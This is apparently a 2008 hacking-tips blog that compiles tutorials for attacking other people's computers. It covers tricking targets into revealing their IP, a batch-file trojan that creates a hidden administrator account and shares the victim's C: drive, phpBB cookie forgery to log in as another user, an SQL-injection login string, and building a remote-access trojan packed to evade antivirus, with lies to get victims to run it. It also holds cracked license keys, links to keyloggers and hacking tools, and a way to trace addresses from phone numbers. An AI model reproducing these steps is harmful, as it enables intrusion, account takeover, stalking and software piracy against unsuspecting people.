Saturday, May 10, 2008
How To Obtain Someone's IP Address
________________________________________
This is a small tutorial I wrote for the basic newbie about the many ways of getting not only their own IP address, but someone else's as well.
I: What is an IP address?
A: How one obtains their own IP address
1: How to obtain own IP by command prompt
2: How to obtain own IP by internet
II: Different types of IP address
A: Dynamic
B: Static
C: How to tell the difference
III: Obtaining a targets IP address
A: Through e-mail
B: Through messenger service
1: Special AIM way
2: Rest of the messengar ways
C: IP of a website
I: An IP address (aka: Internet Protocol Address) is the unique address of a computer on a TCP/IP based network (like the Internet). It is in the format of a 32-bit numeric address written as four "eight octet" numbers seperated by periods (example: 192.168.0.1). Typically each number can be zero to 254. (http://www.webopedia.com/TERM/I/IP_address.html).
A: The way one could obtain their own IP address is by doing one of the following things.
1: Connect to the internet and
Windows 95, 98 or ME; go to start > run > winipcfg
Windows NT, 2000 or XP; go to start > run > type in "cmd". Then when command prompt pops up type in ipconfig
linux; open a shell and type in "ifconfig"
2: If you want to get your own IP address an easier way, connect to the internet and open up IE (internet explorer, or your favorite browser). now go to www.whatismyip.com. However, in some circumstances this won't give you the correct IP address. For instance if you are using a Proxy server or if you are behind a router performing NAT(both of these technologies are beyond the scope of this tutorial).
II: There are basically two different ways to get an IP address, usually the way you get yours depends on your ISP and internet connection. These two types of IPs are "Dynamic" and "Static".
A: A dynamic IP address is an IP address that can change everytime you connect to your ISP, or at regular intervals chosen by your ISP. Typically dynamic IP addresses are assigned by a DHCP server. DHCP stands for Dynamic Host Configuration Protocol and DHCP servers are beyond the scope of this tutorial. The most important thing you need to know about DHCP assigned addresses is that they have the possibility to change, this is mostly dependent on your ISP.
B: A Static IP is the opposite of a dynamic IP, it does not change, hence the name "Static". Typically you are assigned an IP address by your ISP or network administrator.
III: The first thing one has to do before finding out ways to exploit their targets is to find out what their IP address is. This can be done in many ways, and I will name and describe four ways of doing this.
A: I would go through the trouble of explaining how to but there has already been a wonderfully made tutorial on getting a users IP address by sending them an email at http://www.kisp.org/thelibrary/tutor...ng/emailip.htm
B: There are a couple of different ways to get an IP address through messenger services like: AIM, MSN, Yahoo, or even chats.
1: If you are using AIM and want to get another users IP address you have to get the other person to direct connect with you. Typically you have to entice your target's so that they want to do this (read up on Social Engineering for good tips on how to entice unsuspecting users. For example you could tell them you have some cool pictures you want to show them. When they say they'd like to see the pictures you choose "People > Connect to Send IM Image" in the IM window. When you are directly connected go to start > run > command (or cmd for a Windows NT flavor machine) and type in "netstat -an". A list of IPs and Hostnames will come up, these are all the connections to your computer right now, whether it be a website, or that guy you are directly connected with. Now then, the default AIM direct connection port is 4443, when you type in netstat, look for the IP or Hostname with port 4443. This is the target's IP or hostname. If you don't see one on port 4443 just look for a port that is close to that. Or run netstat before you connect and then after you connect and the only additional IP address you see should be your target'ss (provided you're not surfing the web at that time).
C: There is another way you can get an IP address from a target, but this way you have to get the target to click on a link. First you have to set up a port watcher though, what this does is listen on a certain port for connections. You can get one at http://158inc.com/apzp/portwatcher11.zip . Now then, set it to listen on any port you want, and have someone connect to your IP address through the port you are listening on (example: Set it to listen on port 80 and send a link with http://you.rip.addr.ess. The port watcher will capture the IP address that connects through that port.
D: Another very simple way involves Social Engineering. If your target's isn't very smart you can just trick them into giving you their IP. Simply make up some phony story and tell them to go to www.whatismyip.com then just ask them to tell you what the number is. You could make up some story about a certain number being a "winner" and you want to know if they have a winning number or something similarly obsurd.
E: The fourth way to get an IP address I am going to talk about is getting the IP of a website. This way is very easy. Just go to start > run > command > and type in "ping www.thewebsite.com" and it will come back with the IP address.
I hope this tutorial helps a lot of you find out the IP address of yourself and a target, and gives you more knowledge most of all.
Enjoy.
How to make an executable file?
This is how you make it to a .exe
goto to start run and type iexpress
STEP BY STEP ON HOW TO USE IT
click create new self extraction then next
click extract files and run an installation command and click next
type what you want to name the files (ex. hello,virus,fake game hack) then click next
click no prompt then next
license agreement unless you want to put one click do not display license
package files(most important) click add then choose your .bat file(also does .vbs files) then click next
under install program choose your .bat or .vbs file and click next(don't worry about the other one)
show window pick one and click next
finished message pick one and click next
click browse and type the name of it and save to desktop or C: then next
configure restart just click no restart and then next
just click don't save then next
their click next and watchyour file change into something better
when its done click finish and check out your new file
Lock your folder without installing any software
is it possible to Lock your folder without installing any software
ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now rename the text file Loc.bat.and dobble click on it. (it is lock the folder and change it into cotrol pannel shortcut).
Same as to open or unlock the folder creat a new text file in the same drive and past the following text -
ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies
Now rename the text file as "key.bat" and dobble it.it will unlock your folder and u can access the content of this folder.
Its easy......
After loking the folder if u creat another folder in same name on the same drive then the "key.bat" file cant unlock your lock folder.delete or rename the new created folder for work the "key.bat" file again.
Want to Shutdown your opponents PC
Want to Shutdown your opponents PC lets try this
READ IT ok guys EXCELLENT TRICK !!!!!!
with this trick u can make ur OPPONENT'S PC SHUTDOWN.
read CAREFULLLY its very easy and excellent.
SHUTDOWN OPPONENT'S PC FORCEFULLY.
how it runs- you make a shutdown exe and make ur enemy run.
and it happen in 4 EASY STEPS---->>
*************** START ****************
* Open Notepad
* Write Shutdown-S (SHUTDOWN(SPACEBAR)-S)
* Save with name shutdown.bat (BAT STANDS FOR BATCH FILE--NEED NOT TO GET INTO THIS CRAP JUST DO AS I ASK)
* Send the save file through yahoo messenger or through mail to your freind .
***************THATS IT FINISHED***************
OK NOW AS SOON AS UR FRIEND OR ENEMY WILL RUN IT HIS PC WILL SHUTDOWN,WITH THE COUNTDOWN STARTING FROM 30 SEC.
Increase your Internet Bandwidth
Ever seen trick to Increase your Internet Bandwidth by 20%
Increase your Bandwidth by 20%
Windows uses 20% of your bandwidth! Get it back
A nice little tweak for XP. M*crosoft reserve 20% of your available bandwidth for their own purposes (suspect for updates and interrogating your machine etc..)
Here's how to get it back:
Click Start-->Run-->type "gpedit.msc" without the "
This opens the group policy editor. Then go to:
Local Computer Policy-->Computer Configuration-->Administrative Templates-->Network-->QOS Packet Scheduler-->Limit Reservable Bandwidth
Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab :
"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.
works on XP Pro, and 2000
other OS not tested.
Note: Do not limit it to 0%, It cuts your speed, Suggest 1-2% only.
MAKE VISTA GENUINE
How to make vista geniune version??key is here..
download the vista activator from any of the below linkhttp://rs202.rapidshare.com/files/47588614/va2007av.rar
http://rapidshare.com/files/47588614/va2007av.rar
INCREASE NET SPEED
Want key to download Active speed??it is here...
Downlaod Active Speed Here
to change your trail version to full version please enter this username and password
USERNAME:jordan123
PASSWORD:bramjnet7
TRICKS ON ORKUT
here is the link for tht software
http://rapidshare.com/files/68981809/rapidshare_hack_code.rar
hey guys now u can download rapidshare link without typing code it is working 100 % plz see it and plz reply here......
This is true i am not lying..............check it fast..
BSNL Phone No's Address.
Wanna know Address of the girl you like?, or address of your friend?. It is so easy to trace the addresses, just you need is their phone number.
EXAMPLE: For tracing the address of a number located in Madhya Pradesh (India) just log in to
http://www.bsnl.co.in/onlinedirectory.htm
After logging in, select the area (city) to which the phone number belong and then proceed further.
In the option "Search by" , select Telephone number. select the station to which the phone no. belongs and finally write the phone number in the "Search key field" . In this way the address of that particular number will be traced.
For selecting any other state of India, log on to http://www.bsnl.co.in/index.html . In the Right hand side you see the "BSNL units" option (above Username field), select your state from the menu and then proceed further.
NOTE : Try both, number including (2) as well as number excluding (2) as a prefix.
Download UNLIMITED from Rapidshare
Download UNLIMITED from Rapidshare
1. Copy and paste this code :
@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
on your note pad or any other text editor
2. Save the file as : rapidshare.de.bat and leave it on your desktop
3. Every time you download from rapidshare double click on it!
note:it works only on dynamic ip
Have fun!
write scraps vertically
Write any text in the scrapbook and copy and paste the following script on address bar.
javascript:var a=gringo=document.getElementsByTagName('textarea')[0];a.value=a.value.replace(/|/g," \n ");void(0);javascript:cor=new Array('violet','red','orange','yellow','green','blue','navy','purple');var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;yalue=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0)
Hit Enter.
You can see your text in vertical form with different colours.
Universal Magic Links
These are universal magical links. Whenever a person clicks on any of these, he will be redirected to his profile or album or scrapbook
Universal Profile
http://www.orkut.com/Profile.aspx???2pid=11731517960896443124
Universal Album
http://www.orkut.com/AlbumView.aspx?2uid=3492118394569816171
Universal Scrapbook
http://www.orkut.com/Scrapbook.aspx?2uid=6849219260034274333
ADD YOUR SIGNATURES..
Auto add signature...
Auto add signature at the end of your community posts...
download link
http://internet.geek.2007.googlepages.com/autosig.user.js
this will work fine in community posts
LOLz.. righclick greasemonkey icon, click manage user scrips.. go to autosig, click edit.. it'll open in notepad.. edit d sig wid ur name..
yoooooooo
http://www.yazgulu.com/Guller/126.swf
http://www.yazgulu.com/Guller/115.swf
http://www.yazgulu.com/Guller/114.swf
http://www.yazgulu.com/Guller/113.swf
http://www.yazgulu.com/Guller/118.swf
http://www.yazgulu.com/Guller/119.swf
http://www.yazgulu.com/Guller/120.swf
http://www.yazgulu.com/Guller/121.swf
http://www.yazgulu.com/Guller/123.swf
http://www.yazgulu.com/Guller/124.swf
http://www.yazgulu.com/Guller/127.swf
HACKING TOOLS
http://rapidshare.com/files/53227068/Ht
http://rapidshare.com/files/53230471/Ht
Rapidshare hackers
http://rapidshare.com/files/43093441/rh
pass: mechodownload
MSN HACK
http://rapidshare.com/files/38797836/Ms
PC HACKING
http://rapidshare.com/files/20414134/PC
Password Hacking AIO
http://rapidshare.com/files/15144318/Pa
Sub7 For Experts
!!Download Ultimate Hcking Tool "Sub7 legends"!!!!
Not for beginners!!!!! use carefully!!! Tutorial provided inside zip
password: 123456
click to get
http://www.filefactory.com/file/8207bf
Yahoo Booter!!
YAHOO BOOTER
http://rapidshare.com/files/55825962/Co
1) Double click the .exe file. Labeled "Colts 1Bot YaHell.exe". A window containing the main forum labeled "Colts 1Bot YaHell" should pop up.
2) Now we need to enter the bot name in the label titled "Y! Name" and the password into the label titled "Y! Pass"
3) Pretty much self explanitory...hit the "login button"
4) Now you type your nameyou want to boot into the label titled "Lamer" and choose one of your three booting options. Which include PM Bomb, Imv Bomb, and Buzz Bomb
Yahoo Magic Pass
use this one really easy
mAgic Password |Sender
http://rapidshare.com/files/56051314/mp
working
http://www.imagehosting.com/show.php/11
http://www.imagehosting.com/show.php/11
http://www.imagehosting.com/show.php/11
Perfect Keylogger
If u visited our website u'll hav located by urself....
Perfect Keylogger
javascript:void(0);
submit
http://rapidshare.com/files/57868957/i_
username:::::: syk071c
serial key::::::: TLAM-GYUQ-JYCI-SLUO
Google Code Search Tool Could help Hackers
Google's (Nasdaq: GOOG) Latest News about Google new Code Search, a developer tool that scours the Internet for software code, is stirring up buzz over what some see as its potential for misuse by computer HP Multifunction printers - get a free 30-day trial today. attackers.
Code Search is meant to optimize searches for specific software codes, scripts, licenses and related information. However, concerns have arisen over possible nefarious uses of the tool. It conceivably could make it easier for attackers to find software holes, exploit codes and proprietary code that is already available on the Internet.
"It does make it easy to perform a query to find code that might be interesting to you," said VeriSign iDefense Latest News about iDefense Rapid Response Team Director Ken Dunham, including software security holes and actual exploit code for attacks. "As seen with any tool, yes, it is a double-edged sword. Both sides can use it to find vulnerabilities or exploit code."
The downside of useful Internet tools such as this one is nothing new, however, as computer worms have previously relied on Google and other search engines to find vulnerable systems, IT-Harvest Chief Research Analyst Richard Stiennon told LinuxInsider. The tools are also put to use by the good guys, though, and the result is positive overall.
"It helps in the long term to create a healthier ecosystem of the Internet," he said.
Top of Mind
Google's is by no means the first search engine to be used to find vulnerabilities or victims, according to Stiennon. He referred to an Alta Vista search engine-assisted attack on Lotus users more than five years ago.
"It's always been a great tool for attackers," he said, indicating Google has also been used repeatedly to find vulnerable software, systems and users -- including corporate ones.
Search engine security issues may, in fact, provide an opportunity for a new security market, he said. Google has so far responded well to such matters. The firm should not be blamed for ill deeds done with its products or services, he opined.
"I wouldn't blame Google or point the finger at them, because the actual code is already there," he said.
Google Code Search includes only publicly accessible information and is intended to serve as a resource for developers to find sample code and obscure function definitions. It helps them discover code they didn't know about and, at the same time, promotes collaboration, Google spokesperson Barry Schnitt told LinuxInsider.
"We hope that it will be used as a tool for solving security issues and actually help people prevent exploits," he said. "In cases where we can help prevent certain malicious behavior, we'll try to do that. We're working on some changes already and, as with any Google service, we're open to suggestions from our users."
Google has a process for those who do not want their code "crawled," or scanned by Google's search engine, Schnitt added, and copyright owners can remove proprietary code from the Code Search results if they want to.
Meanwhile, the security issues raised by Google Code Search are opening the door to more discussion about the security merits of open source Latest News about open source software, which is available to anyone.
The public availability of source code may make it more vulnerable to attack, but on the flipside, the expanded army of programmers who also have access to the code will be able to secure it faster and better, said VeriSign iDefense's Dunham.
New Yahoo! Messenger Virus Attack, how to prevent it if effected
To solve this problem, Just go through the below steps carefully.
What are those links ?:
Nsl-school.org or other (Do not open this url in your browser).
IPB Image
If you are infected with it what is going to happen ?
1:
2: It will disables the Task manager / reg edit. So you can't kill the Trojan process anymore.
3:
You can find these files in windows/ & temp/ directories.
4: It will sends the secured & protected information to attacker
How to remove this manually from your computer ?
1: Close the IE browser. Log out messenger / Remove Internet Cable.
2: To enable Regedit
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
Code: REG add HKCUSoftwareMic*ftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 0 /f
3: To enable task manager : (To kill the process we need to enable task manager)
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
Code: REG add HKCUSoftwareMic*ftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 0 /f
4: Now we need to change the default page of IE though regedit.
Start>Run>Regedit
From the below locations in Regedit chage your default home page to hackgyan.com or other
Code: HKEY_CURRENT_USERSOFTWAREMic*ftInternet ExplorerMain
HKEY_ LOCAL_MACHINESOFTWAREMic*ftInternet ExplorerMain
HKEY_USERSDefaultSoftwareMic*ftInternet ExplorerMain
Just replace the attacker site with hackgyan.com or set it to blank page.
5:
Kill the process svhost32.exe . ( may be more than one process is running.. check properly)
6:
7: Go to regedit search for svhost and delete all the results you get
Code: Start>Run>Regedit
8: Restart the computer. That's it now your system is virus free
MAKING YOUR OWN TORJAN IN A .bat file
-Bazics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:
dir
pause
And now save this as test.bat and execute it.
Funny aint it ?
---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.
Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant
Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.
Command n 3->net share system=C: /unlimited
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.
-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.
Command n 1 -> net use victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer victimipsystem
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
ISP HACKING
This ain't a tutorial on web defacement or ISP hacking....
This is a little visual proof of ISP hacking ....
Attached here some screenshots which feast ur eyes with turbo speed..
Note:-Look at the blazing speed of DAP, even though four other peer-peer softwares are at work.....
Some Questions my Fetians asked me in Haridwar recently:---
Are We Prepared To Hack Our ISP... What Skills r required??
The first and foremost requirement is that either u or ur dad should
b a lawyer....
skill set ranges with the type of attack...
though a good knowledge of web technologies... is a must.
Why Should We Hack Our ISP ?
U should/could hack ur ISP if u want more speed at the current price.It may boost ur current speed to 1Mbps download speed.
(Download speed and connection speed are different eg:- 256Kbps will have max 29-31Kbps download speed)
What We Gain After ISP Hacking?
It depends upon the type of hack u perform...may range from Total ISP control to speed boosting.
What Are The Consequences Of ISP Hacking?
May result from life time computer ban with a huge money payment...cyber law is being renewd..may also have other consequences
This is just to show u what ISP hacking looks and feels like ....
I'm releasing my ISP's IP add... and i'm no way responsible to what u may do...or the consequences u get into if u mess with my ISP's IP
The main question is always 'HOW'...
Well i port scanned my ISP..found many open ports.....
one of them was 3306 running SQL for authentication....
if u would 've seen from the third Screenshot give above the login page...u would have seen ..that i log into some IP... starting from 203.x.x.x
well thats not the ISP IP..it is just my default gateway.....
By ISP i mean my ISP which is providing me the service...
E.g:-- Like most of the bandwidth is provided by Alcatel and others in India.....
then used by BSNL,MTNL....
then maybe HOTWIRE...so my ISP is hotwire and not others....
u can know the connection speed or make a fairly good asumption by their IP...like my ISP's IP is '61.16.200.238'
60.x.x.x...61.x.x.x ...indicates it may have a broadband conn.....
by IP we can also know if someone has dial-up..etc etc..
Conclusion....
Find ur ISP's IP(Not the NATed one real)..u r on the network so it wont be tough.....
portscan ur ISP(plz use double proxy)...find open ports
enter the system through open ports...
find the services running on the port........
find the traget OS,and even better find which security org is securing it....
learn the vulerabilites and exploits of the running services....
leave a self made prog...which sends u stored passwords
HACKING phpbb FORUMS
Let's go directly to our main purpose here, first of all, we need some preparation work.
1. Get target password's md5 hash - in this tutorial it's 098f4bcd4621d373caae4e832628b4f6
2. You need to know target's "user_id". For this use the phpBB feature called "memberlist" and
search for target's username and then look at his profile. In our example url to taget's profile
is:
http://localhost/phpbb206c/profile.php?mode=viewprofile&u=3
As you can see, "u=3", so target has "user_id" equal to "3".
3. You must have properly working Mozilla browser
Now, let's move further. I assume, you allready know, where are located Mozilla's cookies. I have
WindowsXP Home Edition and logged-in username "nobody", so cookie file is located in folder:
C:Documents and Settings
obodyApplication DataMozillaProfiles[some subfolders]cookies.txt
Cookie file manual editing is dangerous, so beware. I suggest to make the backup first.
Next, I assume, that you allready have account on target forum. Go to login page, enter your
username and password and check the checkbox named "Log me on automatically each visit:".
In this way you will force phpBB to store your pasword's md5 hash in your browser cookies.
Ok, you are logged in. Don't log out! And close Mozilla browser!! It's is very important!!!!!!!
Open "cookies.txt" and try to find cookie, which belongs to target server and named something like
"phpbb2mysql_data". Btw, phpbb configuration settings can override this name, so if you have probs
finding of the right cookie, then use Mozilla's Cookie Manager and remove ALL cookies. Now right
after the cookie cleanup login to target phpbb and you can see in cookie file your target cookie.
So, you see long textline similar to this:
www.target.com FALSE / FALSE 1114433252 phpbb2mysql_data
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2219dd1947a95454c
caf223a731c32db0c%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%224%22%3B%7D
Hmm, this cookie's value seems to be complicated to understand, is'nt? Lets analize it a little bit.
First, after urldecode() we will get something like:
a:2:{s:11:"autologinid";s:32:"19dd1947a95454ccaf223a731c32db0c";s:6:"userid";s:1:"4";}
Wtf is this? This is stuff you get, if you use php's function "serialize()" on some array.
I don't want to get in details, because this is kinda offtopic right now. But i think, that you
can see in this string 2 known variables:
1. s:32:"19dd1947a95454ccaf223a731c32db0c"; --> 19dd1947a95454ccaf223a731c32db0c - this must be you password's md5 hash.
2. ";s:6:"userid";s:1:"4";} --> "4"- this is of course your "user_id".
Now, you remember target's user_id and password's md5 hash, don't you
target's md5 - 098f4bcd4621d373caae4e832628b4f6
target's user_id - 3
So edit this cookie with notepad or wordpad and swap original values with target values.
In previous example we had cookie value like this:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2219dd1947
a95454ccaf223a731c32db0c%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%224%22%3B%7D
and after editing we have cookie value like this:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22098f
4bcd4621d373caae4e832628b4f6%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D
If you compare those two strings, you an easily understand, where i was making the changes.
Finally, after cookiefile's editing and saving, open Mozilla and browse to target phpBB forum. If all went
perfectly, you have now "logged in" as target.
Mission complete!
HACKING WEBSITES
To hack a Password Protected Websites just follow these steps: -
* Open the website u want to hack. Provide wrong username-password.
(e.g : Username - me and Password - ' or 1=1 --)
An error occured saying wrong username-password. Now be prepared
ur work starts from here...
* Right click anywhere on that page =>> go to view source.
* There u can see the html codings with javascripts.
* There u find somewhat like this..
UNDETECTABLE REMOTE HACKING
Undetectable Remote Hacking
A noob proof tutorial on remote hacking which is 90% undetectable
In this tutorial you will learn how to hack a computer any where in the world. Ok well not anywhere obviously things like the military and the goverment will have very high security so you definately wont be able 2 hack them using this method. I hope not aniways =.
A Major Notice If you are behind a router you will need to port forward your router. To do this you can use a DMS. Its hard to explain as every router has a different interface ( homepage that has a different layout ) so i suggest you go to google and search portforward.com. It will teach you how to port forward your router there.
Ok to begin with you will need these three tools : -
Daemon Crypt - http://rapidshare.com/files/8161346/Daemon_Crypt.rar
Pc Guard - http://rapidshare.com/files/11136172/PC_GUard.rar
Yuri Rat - http://rapidshare.com/files/8161510/Yuri_Rat.rar
Ok now that you have these three tools your 1st step will be to open up Yuri Rat and then click on server build
You should now have the following the screen
In this screen I want you to put your IP address into the DNS/IP section.
To get IP Address go to Start > Run > Type CMD and hit enter. When the black box appears type in IPCONFIG. You will then have your IP Address
Port: You Can Leave As Default (-7898-)
Assigned Name: Doesn’t effect how the server will work its just to keep you more organized so if you wanted to hack your friend “JOE” and specifically make this server for him then you may want to type something like “JOES TROJAN”.
Server Install Name: You should leave this as default as I myself don’t know what the difference is as every server you make is named server when it is 1st created anyway. Do not change it as it may make problems but I am not sure.
Ok as you can see there are more settings on the right hand side. I am going to recommend you settings for different purposes
To Hack A Friend For Fun: Uncheck Everything Unless You Want To Do Optional
(OPTIONAL) Melt Server - Your server will disappear into another folder
(OPTIONAL) Custom Icon if you want to make it more believable or something then get an icon of super Mario or something you get my drift
To Find Out Valuable Information: Check Everything
Ok Now You Are Finished Click Build
Your server will then be saved to your C: or Hard Drive which ever you know it as. Now we are going to make the server about 90% Undetectable. Only once has one of my servers been detected by an anti virus and I think it was a Norton not sure which version. Ive scanned more then once with Kasper Sky & Symantec Anti Virus and every time they said its clean so lets begin
Open Up Daemon Crypt
Select Your File by clicking browse and going to the folder your server is in. If you have not moved it, it will most likely be in C:
So Now You Have This
Click On Crypt and then you can close Daemon Tools
Now Install Your Pc Guard for Win32
When you open it you should get this
Ok you have to do basically the same thing as what you did with daemon tools. Click Browse and then find your server so that you have this
You then want to click on the General Settings and put these settings
Ok now you want to go to customization and make sure nothing is ticked
For the last step you want to click the protection methods tab and set it to plain. And then click on protect
Your server is now undetectable =)
Ok so now we have our server and everything is ready to go. Only thing now is to do some social engineering. Basically just lie to your friend/victim and tell them that it is a harmless file. If you do not know anything about your victim talk 2 him for like 3 days find out what he likes. Then lets say he likes football and naked women XD. say to him its a funny game where you play a 5minute 2D football match and if you win a sexc girl comes up on the screen and strips or something along them lines. Im not to good at social engineering. You could even say to your friend/victim that it is a patch for a game that you know that they have and it adds on extra things. The Server is now on there computer and they have double clicked it. If you checked the melt server option then the server will basically evaporate into their computer. They say hey its not working you say hey thats strange it works on my comp. Ahh fuck it i cant b bothered 2 send it again..
Ok so now you have the server running on there comp and it has opened up the default port for you to connect to.
Once again open Yuri Rat and click on listen. Yuri rat will then listen for your online servers that you have gave to people running on the default port 7898. If the person who you sent the rat to is not online you cant connect. When the server you sent out to your friend/victim a balloon notification will pop up. Note that yuri rat should still be listening for the servers. The server will show up in yuri rat. You right click and press connect. And there you go. you are now successfully connected to your victim
Ok now without uploading plug ins from yuri rat to your friends/victims computer you will only be able to do limited things with the program which are Download files from there comp & put files from your comp onto their comp.
When you are connected click on plug ins and them upload all of them.
You will then have access to keyloggers, screen capture and muc more. If you get stuck click on the help button and it wil tel you more aout plug in
HACKING INTO COMPUTER (WITH PICTURES)
Hacking Into a Computer (With Pictures)
For this tutorial, I used Microsoft’s Windows XP Home Edition OS.
-What is it?-
NetBIOS Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.
-How can this be of use to me?-
Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.
-What do I need?-
1) Windows OS
2) A Small hacking tool (Download from here)
Part 1, Finding the target
So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross
Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.
It should begin to scan.
Then IP’s, computer names, and mac addresses will show up. Now remember the IP address of the computer you are going to be breaking into. If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok. During the next step we will begin our trial and error.
Part 2, Trial and Error
Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the start menu and go to run, type in cmd, and click ok. This should bring up the command prompt. From here we will do most of the hacking. Now I will be referring to certain commands that need to be inputted into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let’s get back to the hacking. Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.” This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private information):
IF it didn’t work, meaning that the target is not online, it will look something like this:
If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.
Part 3, Gathering the Information.
Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.” This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.
Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.
The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.
The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.
The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup
Step 4, Breaking In
Finally it’s time. By now we know: that our target is online, our target has file sharing, and our target’s computer name. So it’s time to break in. We will now locate the shared drives, folders, files, or printers. Type in “net view (IP Address of Target)”
An example for this tutorial would be: “net view 192.168.1.103”
We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.
All's that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: (IP Address of Target)(Shared Drive). For my example in this tutorial, “net use K: 192.168.1.103C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G...,” for a different target.
As you can see, for my hack I have already used “K,” so I used “G” instead. You may also do the same for multiple hacks. If it worked, it will say “The command completed successfully.” If not, you will have to go retrace you steps. Now open up “my computer” under the start menu, and your newly created network drive should be there.
Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network. So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know if the target changes the sharing setting. If you are just doing this to hack something, then go explore it and have some well deserved fun!
Congratulations! You’re DONE!
-Commands used in this tutorial:
Code: |
PING NBTSTAT -a (IP Address of Target) NET VIEW (IP Address of Target) NET USE K: (IP Address of Target)(SHARENAME) |
HACKING WINDOWS XP
Hacking Windows XP
How to hack into a windows xp computer without changing password
To login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords.
